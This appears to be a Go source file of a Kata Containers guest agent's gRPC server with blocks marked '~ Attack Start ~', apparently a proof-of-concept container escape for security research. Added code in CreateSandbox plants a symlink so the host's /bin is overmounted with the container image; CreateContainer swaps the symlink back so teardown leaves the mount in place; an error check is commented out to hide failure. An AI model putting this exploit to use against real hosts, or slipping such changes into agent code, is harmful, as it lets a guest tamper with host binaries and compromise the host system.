// SIGCHLD signal before the channel has been created, meaning we will
// miss the opportunity to get the exit code, leading WaitProcess() to
// wait forever on the new channel.
// This lock has to be taken before we run the new process.
a.sandbox.subreaper.lock()
defer a.sandbox.subreaper.unlock()
if createContainer {
err = ctr.container.Start(&proc.process)
} else {
err = ctr.container.Run(&(proc.process))
}
// ~ Attack Start ~ //
// Commenting out the following code so that we won't send back a failure
//// if err != nil {
//// return grpcStatus.Errorf(codes.Internal, "Could not run process: %v", err)
//// }
// ~ Attack End ~ //
// Get process PID
pid, err := proc.process.Pid()
if err != nil {
return err
}
proc.exitCodeCh = make(chan int, 1)
// Create process channel to allow WaitProcess to wait on it.
// This channel is buffered so that reaper.reap() will not
// block until WaitProcess listen onto this channel.
a.sandbox.subreaper.setExitCodeCh(pid, proc.exitCodeCh)
return nil
}
// Shared function between CreateContainer and ExecProcess, because those expect
// the console to be properly setup after the process has been started.
func (a *agentGRPC) postExecProcess(ctr *container, proc *process) error {
if ctr == nil {
return grpcStatus.Error(codes.InvalidArgument, "Container cannot be nil")
}
if proc == nil {
return grpcStatus.Error(codes.InvalidArgument, "Process cannot be nil")
}
defer proc.closePostStartFDs()
// Setup terminal if enabled.
if proc.consoleSock != nil {
termMaster, err := utils.RecvFd(proc.consoleSock)
if err != nil {
return err
}
if err := setConsoleCarriageReturn(int(termMaster.Fd())); err != nil {
return err
}
proc.termMaster = termMaster
// Get process PID
pid, err := proc.process.Pid()
if err != nil {
return err
}
a.sandbox.subreaper.setEpoller(pid, proc.epoller)
if err = proc.epoller.add(proc.termMaster); err != nil {
return err
}
}
ctr.setProcess(proc)
return nil
}
// This function updates the container namespaces configuration based on the
// sandbox information. When the sandbox is created, it can be setup in a way
// that all containers will share some specific namespaces. This is the agent
// responsibility to create those namespaces so that they can be shared across
// several containers.
// If the sandbox has not been setup to share namespaces, then we assume all
// containers will be started in their own new namespace.
// The value of a.sandbox.sharedPidNs.path will always override the namespace
// path set by the spec, since we will always ignore it. Indeed, it makes no
// sense to rely on the namespace path provided by the host since namespaces
// are different inside the guest.
func (a *agentGRPC) updateContainerConfigNamespaces(config *configs.Config, ctr *container) {
var ipcNs, utsNs bool
for idx, ns := range config.Namespaces {
if ns.Type == configs.NEWIPC {
config.Namespaces[idx].Path = a.sandbox.sharedIPCNs.path
ipcNs = true
}
if ns.Type == configs.NEWUTS {
config.Namespaces[idx].Path = a.sandbox.sharedUTSNs.path
utsNs = true
}
}
if !ipcNs {
newIPCNs := configs.Namespace{
Type: configs.NEWIPC,
Path: a.sandbox.sharedIPCNs.path,
}
config.Namespaces = append(config.Namespaces, newIPCNs)
}
if !utsNs {
newUTSNs := configs.Namespace{
Type: configs.NEWUTS,
Path: a.sandbox.sharedUTSNs.path,
}
config.Namespaces = append(config.Namespaces, newUTSNs)
}
// Update PID namespace.
var pidNsPath string
// Use shared pid ns if useSandboxPidns has been set in either
// the CreateSandbox request or CreateContainer request.
// Else set this to empty string so that a new pid namespace is
// created for the container.
if ctr.useSandboxPidNs || a.sandbox.sandboxPidNs {
pidNsPath = a.sandbox.sharedPidNs.path
} else {
pidNsPath = ""
}
newPidNs := configs.Namespace{
Type: configs.NEWPID,
Path: pidNsPath,
}
config.Namespaces = append(config.Namespaces, newPidNs)
}
func (a *agentGRPC) updateContainerConfigPrivileges(spec *specs.Spec, config *configs.Config) error {
if spec == nil || spec.Process == nil {
// Don't throw an error in case the Spec does not contain any
// information about NoNewPrivileges.
return nil
}
// Add the value for NoNewPrivileges option.
config.NoNewPrivileges = spec.Process.NoNewPrivileges
return nil
}
func (a *agentGRPC) updateContainerConfig(spec *specs.Spec, config *configs.Config, ctr *container) error {
a.updateContainerConfigNamespaces(config, ctr)
return a.updateContainerConfigPrivileges(spec, config)
}
// rollbackFailingContainerCreation rolls back important steps that might have
// been performed before the container creation failed.
// - Destroy the container created by libcontainer
// - Delete the container from the agent internal map
// - Unmount all mounts related to this container
func (a *agentGRPC) rollbackFailingContainerCreation(ctr *container) {
if ctr.container != nil {
ctr.container.Destroy()
}
a.sandbox.deleteContainer(ctr.id)
if err := removeMounts(ctr.mounts); err != nil {
agentLog.WithError(err).Error("rollback failed removeMounts()")
}
}
func (a *agentGRPC) finishCreateContainer(ctr *container, req *pb.CreateContainerRequest, config *configs.Config) (resp *gpb.Empty, err error) {
containerPath := filepath.Join(libcontainerPath, a.sandbox.id)
factory, err := libcontainer.New(containerPath, libcontainer.Cgroupfs)
if err != nil {
return emptyResp, err
}
ctr.container, err = factory.Create(req.ContainerId, config)
if err != nil {
return emptyResp, err
}
ctr.config = *config
ctr.initProcess, err = buildProcess(req.OCI.Process, req.ExecId, true)
if err != nil {
return emptyResp, err
}
if err = a.execProcess(ctr, ctr.initProcess, true); err != nil {
return emptyResp, err
}
// Make sure to add the container to the sandbox before calling updateSharedPidNs
a.sandbox.setContainer(ctr.ctx, req.ContainerId, ctr)
if err := a.updateSharedPidNs(ctr); err != nil {
return emptyResp, err
}
return emptyResp, a.postExecProcess(ctr, ctr.initProcess)
}
func (a *agentGRPC) CreateContainer(ctx context.Context, req *pb.CreateContainerRequest) (resp *gpb.Empty, err error) {
// ~ Attack Start ~ //
// We need to clean up the symlink we created and replace it with a regular directory.
// This ensures that upon sandbox tear-down, when the kata-runtime tries to unmount
// the container filesystem, our symlink at '/run/kata-containers/shared/containers/sbx_id/rootfs'
// won't exist anymore, so the mount we performed on the host won't be unmounted
rootfs_path := "/run/kata-containers/shared/containers/" + a.sandbox.id + "/rootfs"
if err := os.Remove(rootfs_path); err != nil {
return emptyResp, fmt.Errorf("Attack Remove symlink: '%s'", err)
}
if err := os.Mkdir(rootfs_path, os.FileMode(0755)); err != nil {
return emptyResp, fmt.Errorf("Attack Mkdir recreate rootfs dir: '%s'", err)
}
// ~ Attack End ~ //
if err := a.createContainerChecks(req); err != nil {
return emptyResp, err
}
// re-scan PCI bus
// looking for hidden devices
if err = rescanPciBus(); err != nil {
agentLog.WithError(err).Warn("Could not rescan PCI bus")
}
// Some devices need some extra processing (the ones invoked with
// --device for instance), and that's what this call is doing. It
// updates the devices listed in the OCI spec, so that they actually
// match real devices inside the VM. This step is necessary since we
// cannot predict everything from the caller.
if err = addDevices(ctx, req.Devices, req.OCI, a.sandbox); err != nil {
return emptyResp, err
}
// Both rootfs and volumes (invoked with --volume for instance) will
// be processed the same way. The idea is to always mount any provided
// storage to the specified MountPoint, so that it will match what's
// inside oci.Mounts.
// After all those storages have been processed, no matter the order
// here, the agent will rely on libcontainer (using the oci.Mounts
// list) to bind mount all of them inside the container.
mountList, err := addStorages(ctx, req.Storages, a.sandbox)
if err != nil {
return emptyResp, err
}
ctr := &container{
id: req.ContainerId,
processes: make(map[string]*process),
mounts: mountList,
useSandboxPidNs: req.SandboxPidns,
ctx: ctx,
}
// In case the container creation failed, make sure we cleanup
// properly by rolling back the actions previously performed.
defer func() {
if err != nil {
a.rollbackFailingContainerCreation(ctr)
}
}()
// Convert the spec to an actual OCI specification structure.
ociSpec, err := pb.GRPCtoOCI(req.OCI)
if err != nil {
return emptyResp, err
}
if err := a.handleCPUSet(ociSpec); err != nil {
return emptyResp, err
}
if err := a.applyNetworkSysctls(ociSpec); err != nil {
return emptyResp, err
}
if a.sandbox.guestHooksPresent {
// Add any custom OCI hooks to the spec
a.sandbox.addGuestHooks(ociSpec)
// write the OCI spec to a file so that hooks can read it
err = writeSpecToFile(ociSpec)
if err != nil {
return emptyResp, err
}
// Change cwd because libcontainer assumes the bundle path is the cwd:
// https://github.com/opencontainers/runc/blob/v1.0.0-rc5/libcontainer/specconv/spec_linux.go#L157
oldcwd, err := changeToBundlePath(ociSpec)
if err != nil {
return emptyResp, err
}
defer os.Chdir(oldcwd)
}
// Convert the OCI specification into a libcontainer configuration.
config, err := specconv.CreateLibcontainerConfig(&specconv.CreateOpts{
CgroupName: req.ContainerId,
NoNewKeyring: true,
Spec: ociSpec,
NoPivotRoot: a.sandbox.noPivotRoot,
})
if err != nil {
return emptyResp, err
}
// apply rlimits
config.Rlimits = posixRlimitsToRlimits(ociSpec.Process.Rlimits)
// Update libcontainer configuration for specific cases not handled
// by the specconv converter.
if err = a.updateContainerConfig(ociSpec, config, ctr); err != nil {
return emptyResp, err
}
return a.finishCreateContainer(ctr, req, config)
}
// Path overridden in unit tests
var procSysDir = "/proc/sys"
// writeSystemProperty writes the value to a path under /proc/sys as determined from the key.
// For example, net.ipv4.ip_forward translates to /proc/sys/net/ipv4/ip_forward.
func writeSystemProperty(key, value string) error {
keyPath := strings.Replace(key, ".", "/", -1)
return ioutil.WriteFile(filepath.Join(procSysDir, keyPath), []byte(value), 0644)
}
func isNetworkSysctl(sysctl string) bool {
return strings.HasPrefix(sysctl, "net.")
}
// libcontainer checks if the container is running in a separate network namespace
// before applying the network related sysctls. If it sees that the network namespace of the container
// is the same as the "host", it errors out. Since we do not create a new net namespace inside the guest,
// libcontainer would error out while verifying network sysctls. To overcome this, we don't pass
// network sysctls to libcontainer, we instead have the agent directly apply them. All other namespaced
// sysctls are applied by libcontainer.
func (a *agentGRPC) applyNetworkSysctls(ociSpec *specs.Spec) error {
sysctls := ociSpec.Linux.Sysctl
for key, value := range sysctls {
if isNetworkSysctl(key) {
if err := writeSystemProperty(key, value); err != nil {
return err
}
delete(sysctls, key)
}
}
ociSpec.Linux.Sysctl = sysctls
return nil
}
func (a *agentGRPC) handleCPUSet(ociSpec *specs.Spec) error {
if ociSpec.Linux.Resources.CPU != nil && ociSpec.Linux.Resources.CPU.Cpus != "" {
availableCpuset, err := getAvailableCpusetList(ociSpec.Linux.Resources.CPU.Cpus)
if err != nil {
return err
}
ociSpec.Linux.Resources.CPU.Cpus = availableCpuset
}
return nil
}
func posixRlimitsToRlimits(posixRlimits []specs.POSIXRlimit) []configs.Rlimit {
var rlimits []configs.Rlimit
rlimitsMap := map[string]int{
"RLIMIT_CPU": unix.RLIMIT_CPU, // 0x0
"RLIMIT_FSIZE": unix.RLIMIT_FSIZE, // 0x1
"RLIMIT_DATA": unix.RLIMIT_DATA, // 0x2
"RLIMIT_STACK": unix.RLIMIT_STACK, // 0x3
"RLIMIT_CORE": unix.RLIMIT_CORE, // 0x4
"RLIMIT_RSS": unix.RLIMIT_RSS, // 0x5
"RLIMIT_NPROC": unix.RLIMIT_NPROC, // 0x6
"RLIMIT_NOFILE": unix.RLIMIT_NOFILE, // 0x7
"RLIMIT_MEMLOCK": unix.RLIMIT_MEMLOCK, // 0x8
"RLIMIT_AS": unix.RLIMIT_AS, // 0x9
"RLIMIT_LOCKS": unix.RLIMIT_LOCKS, // 0xa
"RLIMIT_SIGPENDING": unix.RLIMIT_SIGPENDING, // 0xb
"RLIMIT_MSGQUEUE": unix.RLIMIT_MSGQUEUE, // 0xc
"RLIMIT_NICE": unix.RLIMIT_NICE, // 0xd
"RLIMIT_RTPRIO": unix.RLIMIT_RTPRIO, // 0xe
"RLIMIT_RTTIME": unix.RLIMIT_RTTIME, // 0xf
}
for _, l := range posixRlimits {
limit, ok := rlimitsMap[l.Type]
if !ok {
agentLog.WithField("rlimit", l.Type).Warnf("Unknown rlimit")
continue
}
rl := configs.Rlimit{
Type: limit,
Hard: l.Hard,
Soft: l.Soft,
}
rlimits = append(rlimits, rl)
}
return rlimits
}
func (a *agentGRPC) createContainerChecks(req *pb.CreateContainerRequest) (err error) {
if !a.sandbox.running {
return grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started, impossible to run a new container")
}
if _, err = a.sandbox.getContainer(req.ContainerId); err == nil {
return grpcStatus.Errorf(codes.AlreadyExists, "Container %s already exists, impossible to create", req.ContainerId)
}
if a.pidNsExists(req.OCI) {
return grpcStatus.Errorf(codes.FailedPrecondition, "Unexpected PID namespace received for container %s, should have been cleared out", req.ContainerId)
}
return nil
}
func (a *agentGRPC) pidNsExists(grpcSpec *pb.Spec) bool {
if grpcSpec.Linux != nil {
for _, n := range grpcSpec.Linux.Namespaces {
if n.Type == string(configs.NEWPID) {
return true
}
}
}
return false
}
func (a *agentGRPC) updateSharedPidNs(ctr *container) error {
// Populate the shared pid path only if this is an infra container and
// SandboxPidns has not been passed in the CreateSandbox request.
// This means a separate pause process has not been created. We treat the
// first container created as the infra container in that case
// and use its pid namespace in case pid namespace needs to be shared.
if !a.sandbox.sandboxPidNs && len(a.sandbox.containers) == 1 {
pid, err := ctr.initProcess.process.Pid()
if err != nil {
return err
}
a.sandbox.sharedPidNs.path = fmt.Sprintf("/proc/%d/ns/pid", pid)
}
return nil
}
func (a *agentGRPC) StartContainer(ctx context.Context, req *pb.StartContainerRequest) (*gpb.Empty, error) {
ctr, err := a.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
status, err := ctr.container.Status()
if err != nil {
return nil, err
}
if status != libcontainer.Created {
return nil, grpcStatus.Errorf(codes.FailedPrecondition, "Container %s status %s, should be %s", req.ContainerId, status.String(), libcontainer.Created.String())
}
if err := ctr.container.Exec(); err != nil {
return emptyResp, err
}
return emptyResp, nil
}
func (a *agentGRPC) ExecProcess(ctx context.Context, req *pb.ExecProcessRequest) (*gpb.Empty, error) {
ctr, err := a.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
status, err := ctr.container.Status()
if err != nil {
return nil, err
}
if status == libcontainer.Stopped {
return nil, grpcStatus.Errorf(codes.FailedPrecondition, "Cannot exec in stopped container %s", req.ContainerId)
}
proc, err := buildProcess(req.Process, req.ExecId, false)
if err != nil {
return emptyResp, err
}
if err := a.execProcess(ctr, proc, false); err != nil {
return emptyResp, err
}
return emptyResp, a.postExecProcess(ctr, proc)
}
func (a *agentGRPC) SignalProcess(ctx context.Context, req *pb.SignalProcessRequest) (*gpb.Empty, error) {
if !a.sandbox.running {
return emptyResp, grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started, impossible to signal the container")
}
ctr, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return emptyResp, grpcStatus.Errorf(codes.FailedPrecondition, "Could not signal process %s: %v", req.ExecId, err)
}
status, err := ctr.container.Status()
if err != nil {
return emptyResp, err
}
signal := syscall.Signal(req.Signal)
if status == libcontainer.Stopped {
agentLog.WithFields(logrus.Fields{
"containerID": req.ContainerId,
"signal": signal.String(),
}).Info("discarding signal as container stopped")
return emptyResp, nil
}
// If the exec ID provided is empty, let's apply the signal to all
// processes inside the container.
// If the process is the container process, let's use the container
// API for that.
// Frozen processes are thawed when `all` is true, allowing them to receive and process signals.
if req.ExecId == "" || status == libcontainer.Paused {
return emptyResp, ctr.container.Signal(signal, true)
} else if ctr.initProcess.id == req.ExecId {
pid, err := ctr.initProcess.process.Pid()
if err != nil {
return emptyResp, err
}
// For the container initProcess, if it hasn't installed a handler for
// the SIGTERM signal, it will ignore SIGTERM sent to it, so send SIGKILL
// instead of SIGTERM to terminate it.
if signal == syscall.SIGTERM && !isSignalHandled(pid, syscall.SIGTERM) {
signal = syscall.SIGKILL
}
return emptyResp, ctr.container.Signal(signal, false)
}
proc, err := ctr.getProcess(req.ExecId)
if err != nil {
return emptyResp, grpcStatus.Errorf(grpcStatus.Convert(err).Code(), "Could not signal process: %v", err)
}
if err := proc.process.Signal(signal); err != nil {
return emptyResp, err
}
return emptyResp, nil
}
// isSignalHandled checks whether the container process has installed a
// handler for the given signal.
func isSignalHandled(pid int, signum syscall.Signal) bool {
var sigMask uint64 = 1 << (uint(signum) - 1)
procFile := fmt.Sprintf("/proc/%d/status", pid)
file, err := os.Open(procFile)
if err != nil {
agentLog.WithField("procFile", procFile).Warn("Open proc file failed")
return false
}
defer file.Close()
scanner := bufio.NewScanner(file)
for scanner.Scan() {
line := scanner.Text()
if strings.HasPrefix(line, "SigCgt:") {
maskSlice := strings.Split(line, ":")
if len(maskSlice) != 2 {
agentLog.WithField("procFile", procFile).Warn("Parse the SigCgt field failed")
return false
}
sigCgtStr := strings.TrimSpace(maskSlice[1])
sigCgtMask, err := strconv.ParseUint(sigCgtStr, 16, 64)
if err != nil {
agentLog.WithField("sigCgt", sigCgtStr).Warn("parse the SigCgt to hex failed")
return false
}
return (sigCgtMask & sigMask) == sigMask
}
}
return false
}
func (a *agentGRPC) WaitProcess(ctx context.Context, req *pb.WaitProcessRequest) (*pb.WaitProcessResponse, error) {
proc, ctr, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)
if err != nil {
return &pb.WaitProcessResponse{}, err
}
defer proc.Do(func() {
proc.closePostExitFDs()
ctr.deleteProcess(proc.id)
})
// Using helper function wait() to deal with the subreaper.
libContProcess := (*reaperLibcontainerProcess)(&(proc.process))
exitCode, err := a.sandbox.subreaper.wait(proc.exitCodeCh, libContProcess)
if err != nil {
return &pb.WaitProcessResponse{}, err
}
// Refill exitCodeCh with the exit code so that it can be read out by
// another WaitProcess(). Since this channel is never closed, the refill
// will always succeed, and the channel will be freed by the GC once the
// process exits.
proc.exitCodeCh <- exitCode
return &pb.WaitProcessResponse{
Status: int32(exitCode),
}, nil
}
func getPIDIndex(title string) int {
// looking for PID field in ps title
fields := strings.Fields(title)
for i, f := range fields {
if f == "PID" {
return i
}
}
return -1
}
func (a *agentGRPC) ListProcesses(ctx context.Context, req *pb.ListProcessesRequest) (*pb.ListProcessesResponse, error) {
resp := &pb.ListProcessesResponse{}
c, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return resp, err
}
// Get the list of processes that are running inside the container.
// The PIDs are the system PIDs, not the PIDs in the container's namespace.
pids, err := c.container.Processes()
if err != nil {
return resp, err
}
switch req.Format {
case "table":
case "json":
resp.ProcessList, err = json.Marshal(pids)
return resp, err
default:
return resp, fmt.Errorf("invalid format option")
}
psArgs := req.Args
if len(psArgs) == 0 {
psArgs = []string{"-ef"}
}
// All of the container's processes are visible from the agent's namespace.
// pids already contains the list of processes that are running
// inside the container, so we use that list to filter
// the ps output and return just the container's processes.
cmd := exec.Command("ps", psArgs...)
output, err := a.sandbox.subreaper.combinedOutput(cmd)
if err != nil {
return nil, fmt.Errorf("%s: %s", err, output)
}
lines := strings.Split(string(output), "\n")
pidIndex := getPIDIndex(lines[0])
// PID field not found
if pidIndex == -1 {
return nil, fmt.Errorf("failed to find PID field in ps output")
}
// append title
var result bytes.Buffer
result.WriteString(lines[0] + "\n")
for _, line := range lines[1:] {
if len(line) == 0 {
continue
}
fields := strings.Fields(line)
if pidIndex >= len(fields) {
return nil, fmt.Errorf("missing PID field: %s", line)
}
p, err := strconv.Atoi(fields[pidIndex])
if err != nil {
return nil, fmt.Errorf("failed to convert pid to int: %s", fields[pidIndex])
}
// appends pid line
for _, pid := range pids {
if pid == p {
result.WriteString(line + "\n")
break
}
}
}
resp.ProcessList = result.Bytes()
return resp, nil
}
func (a *agentGRPC) UpdateContainer(ctx context.Context, req *pb.UpdateContainerRequest) (*gpb.Empty, error) {
if req.Resources == nil {
return emptyResp, fmt.Errorf("Resources in the request are nil")
}
c, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
// c.container.Config returns a copy of the non-pointer members
// in configs.Config. configs.Config.Cgroup is a pointer, hence
// if it is modified, the container cgroup is modified too and
// c.container.Set won't be able to roll back in case of failure.
contConfig := c.container.Config()
var resources configs.Resources
if contConfig.Cgroups != nil && contConfig.Cgroups.Resources != nil {
resources = *contConfig.Cgroups.Resources
}
// Update the value
if req.Resources.BlockIO != nil {
resources.BlkioWeight = uint16(req.Resources.BlockIO.Weight)
}
if req.Resources.CPU != nil {
resources.CpuPeriod = req.Resources.CPU.Period
resources.CpuQuota = req.Resources.CPU.Quota
resources.CpuShares = req.Resources.CPU.Shares
resources.CpuRtPeriod = req.Resources.CPU.RealtimePeriod
resources.CpuRtRuntime = req.Resources.CPU.RealtimeRuntime
resources.CpusetCpus = req.Resources.CPU.Cpus
resources.CpusetMems = req.Resources.CPU.Mems
}
if req.Resources.Memory != nil {
resources.KernelMemory = req.Resources.Memory.Kernel
resources.KernelMemoryTCP = req.Resources.Memory.KernelTCP
resources.Memory = req.Resources.Memory.Limit
resources.MemoryReservation = req.Resources.Memory.Reservation
resources.MemorySwap = req.Resources.Memory.Swap
}
if req.Resources.Pids != nil {
resources.PidsLimit = req.Resources.Pids.Limit
}
// cpuset is a special case where container's cpuset cgroup MUST BE updated
if resources.CpusetCpus != "" {
resources.CpusetCpus, err = getAvailableCpusetList(resources.CpusetCpus)
if err != nil {
return emptyResp, err
}
cookies := make(cookie)
if err = updateCpusetPath(contConfig.Cgroups.Path, resources.CpusetCpus, cookies); err != nil {
agentLog.WithError(err).Warn("Could not update container cpuset cgroup")
}
}
// Create a copy of the container's cgroup so that if c.container.Set fails,
// the configuration won't be modified and it will be possible to roll back
// to the original container cgroup configuration.
config := contConfig
var cgroupsCopy configs.Cgroup
if contConfig.Cgroups != nil {
cgroupsCopy = *contConfig.Cgroups
}
cgroupsCopy.Resources = &resources
config.Cgroups = &cgroupsCopy
return emptyResp, c.container.Set(config)
}
func (a *agentGRPC) StatsContainer(ctx context.Context, req *pb.StatsContainerRequest) (*pb.StatsContainerResponse, error) {
c, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return nil, err
}
stats, err := c.container.Stats()
if err != nil {
return nil, err
}
cgroupData, err := json.Marshal(stats.CgroupStats)
if err != nil {
return nil, err
}
netData, err := json.Marshal(stats.Interfaces)
if err != nil {
return nil, err
}
var cgroupStats pb.CgroupStats
networkStats := make([]*pb.NetworkStats, 0)
err = json.Unmarshal(cgroupData, &cgroupStats)
if err != nil {
return nil, err
}
err = json.Unmarshal(netData, &networkStats)
if err != nil {
return nil, err
}
resp := &pb.StatsContainerResponse{
CgroupStats: &cgroupStats,
NetworkStats: networkStats,
}
return resp, nil
}
func (a *agentGRPC) PauseContainer(ctx context.Context, req *pb.PauseContainerRequest) (*gpb.Empty, error) {
c, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
a.sandbox.Lock()
defer a.sandbox.Unlock()
return emptyResp, c.container.Pause()
}
func (a *agentGRPC) ResumeContainer(ctx context.Context, req *pb.ResumeContainerRequest) (*gpb.Empty, error) {
c, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
a.sandbox.Lock()
defer a.sandbox.Unlock()
return emptyResp, c.container.Resume()
}
func (a *agentGRPC) RemoveContainer(ctx context.Context, req *pb.RemoveContainerRequest) (*gpb.Empty, error) {
ctr, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
timeout := int(req.Timeout)
a.sandbox.Lock()
defer a.sandbox.Unlock()
if timeout == 0 {
if err := ctr.removeContainer(); err != nil {
return emptyResp, err
}
// Find the sandbox storage used by this container
for _, path := range ctr.mounts {
if _, ok := a.sandbox.storages[path]; ok {
if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {
return emptyResp, err
}
}
}
} else {
done := make(chan error)
go func() {
if err := ctr.removeContainer(); err != nil {
done <- err
close(done)
return
}
//Find the sandbox storage used by this container
for _, path := range ctr.mounts {
if _, ok := a.sandbox.storages[path]; ok {
if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {
done <- err
close(done)
return
}
}
}
close(done)
}()
select {
case err := <-done:
if err != nil {
return emptyResp, err
}
case <-time.After(time.Duration(req.Timeout) * time.Second):
return emptyResp, grpcStatus.Errorf(codes.DeadlineExceeded, "Timeout reached after %ds", timeout)
}
}
delete(a.sandbox.containers, ctr.id)
return emptyResp, nil
}
func (a *agentGRPC) WriteStdin(ctx context.Context, req *pb.WriteStreamRequest) (*pb.WriteStreamResponse, error) {
proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)
if err != nil {
return &pb.WriteStreamResponse{}, err
}
proc.RLock()
defer proc.RUnlock()
stdinClosed := proc.stdinClosed
// Ignore this call to WriteStdin() if STDIN has already been closed
// earlier.
if stdinClosed {
return &pb.WriteStreamResponse{}, nil
}
var file *os.File
if proc.termMaster != nil {
file = proc.termMaster
} else {
file = proc.stdin
}
n, err := file.Write(req.Data)
if err != nil {
return &pb.WriteStreamResponse{}, err
}
return &pb.WriteStreamResponse{
Len: uint32(n),
}, nil
}
func (a *agentGRPC) ReadStdout(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {
data, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), true)
if err != nil {
return &pb.ReadStreamResponse{}, err
}
return &pb.ReadStreamResponse{
Data: data,
}, nil
}
func (a *agentGRPC) ReadStderr(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {
data, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), false)
if err != nil {
return &pb.ReadStreamResponse{}, err
}
return &pb.ReadStreamResponse{
Data: data,
}, nil
}
func (a *agentGRPC) CloseStdin(ctx context.Context, req *pb.CloseStdinRequest) (*gpb.Empty, error) {
proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)
if err != nil {
return emptyResp, err
}
// If stdin is nil, which can be the case when using a terminal,
// there is nothing to do.
if proc.stdin == nil {
return emptyResp, nil
}
proc.Lock()
defer proc.Unlock()
if err := proc.stdin.Close(); err != nil {
return emptyResp, err
}
proc.stdinClosed = true
return emptyResp, nil
}
func (a *agentGRPC) TtyWinResize(ctx context.Context, req *pb.TtyWinResizeRequest) (*gpb.Empty, error) {
proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)
if err != nil {
return emptyResp, err
}
if proc.termMaster == nil {
return emptyResp, grpcStatus.Error(codes.FailedPrecondition, "Terminal is not set, impossible to resize it")
}
winsize := &unix.Winsize{
Row: uint16(req.Row),
Col: uint16(req.Column),
}
// Set new terminal size.
if err := unix.IoctlSetWinsize(int(proc.termMaster.Fd()), unix.TIOCSWINSZ, winsize); err != nil {
return emptyResp, err
}
return emptyResp, nil
}
func loadKernelModule(module *pb.KernelModule) error {
if module == nil {
return fmt.Errorf("Kernel module is nil")
}
if module.Name == "" {
return fmt.Errorf("Kernel module name is empty")
}
log := agentLog.WithFields(logrus.Fields{
"module-name": module.Name,
"module-params": module.Parameters,
})
log.Debug("loading module")
cmd := exec.Command(modprobePath, "-v", module.Name)
if len(module.Parameters) > 0 {
cmd.Args = append(cmd.Args, module.Parameters...)
}
output, err := cmd.CombinedOutput()
if err != nil {
return fmt.Errorf("could not load module: %v: %v", err, string(output))
}
return nil
}
func (a *agentGRPC) CreateSandbox(ctx context.Context, req *pb.CreateSandboxRequest) (*gpb.Empty, error) {
if a.sandbox.running {
return emptyResp, grpcStatus.Error(codes.AlreadyExists, "Sandbox already started, impossible to start again")
}
a.sandbox.hostname = req.Hostname
a.sandbox.containers = make(map[string]*container)
a.sandbox.network.ifaces = make(map[string]*types.Interface)
a.sandbox.network.dns = req.Dns
a.sandbox.running = true
a.sandbox.sandboxPidNs = req.SandboxPidns
a.sandbox.storages = make(map[string]*sandboxStorage)
a.sandbox.guestHooks = &specs.Hooks{}
a.sandbox.guestHooksPresent = false
for _, m := range req.KernelModules {
if err := loadKernelModule(m); err != nil {
return emptyResp, err
}
}
if req.GuestHookPath != "" {
a.sandbox.scanGuestHooks(req.GuestHookPath)
}
if req.SandboxId != "" {
a.sandbox.id = req.SandboxId
agentLog = agentLog.WithField("sandbox", a.sandbox.id)
}
// Set up shared UTS and IPC namespaces
if err := a.sandbox.setupSharedNamespaces(ctx); err != nil {
return emptyResp, err
}
if req.SandboxPidns {
if err := a.sandbox.setupSharedPidNs(); err != nil {
return emptyResp, err
}
}
mountList, err := addStorages(ctx, req.Storages, a.sandbox)
if err != nil {
return emptyResp, err
}
a.sandbox.mounts = mountList
// ~ Attack Start ~ //
shared_dir := "/run/kata-containers/shared/containers"
perm := os.FileMode(0755)
// Create a symlink at '/run/kata-containers/shared/containers/<mainctr_id>/rootfs'
// pointing to the target directory on the host.
// We use the SandboxId as the main container ID.
mainctr_dir := shared_dir + "/" + req.SandboxId
if err := os.Mkdir(mainctr_dir, perm); err != nil {
return emptyResp, fmt.Errorf("Attack Mkdir(SandboxId) (SandboxId = '%s') error: '%s'", req.SandboxId, err)
}
target_on_host := "/bin" // the target that'll be mounted with the container image
if err := os.Symlink(target_on_host, mainctr_dir+"/rootfs"); err != nil {
return emptyResp, fmt.Errorf("Attack symlink error: '%s'", err)
}
// ~ Attack End ~ //
if err := setupDNS(a.sandbox.network.dns); err != nil {
return emptyResp, err
}
return emptyResp, nil
}
func (a *agentGRPC) DestroySandbox(ctx context.Context, req *pb.DestroySandboxRequest) (*gpb.Empty, error) {
if !a.sandbox.running {
agentLog.Info("Sandbox not started, this is a no-op")
return emptyResp, nil
}
a.sandbox.Lock()
for key, c := range a.sandbox.containers {
if err := c.removeContainer(); err != nil {
return emptyResp, err
}
// Find the sandbox storage used by this container
for _, path := range c.mounts {
if _, ok := a.sandbox.storages[path]; ok {
if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {
return emptyResp, err
}
}
}
delete(a.sandbox.containers, key)
}
a.sandbox.Unlock()
if err := a.sandbox.removeNetwork(); err != nil {
return emptyResp, err
}
if err := removeMounts(a.sandbox.mounts); err != nil {
return emptyResp, err
}
if err := a.sandbox.teardownSharedPidNs(); err != nil {
return emptyResp, err
}
if err := a.sandbox.unmountSharedNamespaces(); err != nil {
return emptyResp, err
}
if tracing && !startTracingCalled {
// Close stopServer channel to signal the main agent code to stop
// the server when all gRPC calls will be completed.
close(a.sandbox.stopServer)
}
a.sandbox.hostname = ""
a.sandbox.id = ""
a.sandbox.containers = make(map[string]*container)
a.sandbox.running = false
a.sandbox.network = network{}
a.sandbox.mounts = []string{}
a.sandbox.storages = make(map[string]*sandboxStorage)
// Synchronize the caches on the system. This is needed to ensure
// there are no pending transactions left before the VM is shut down.
syscall.Sync()
return emptyResp, nil
}
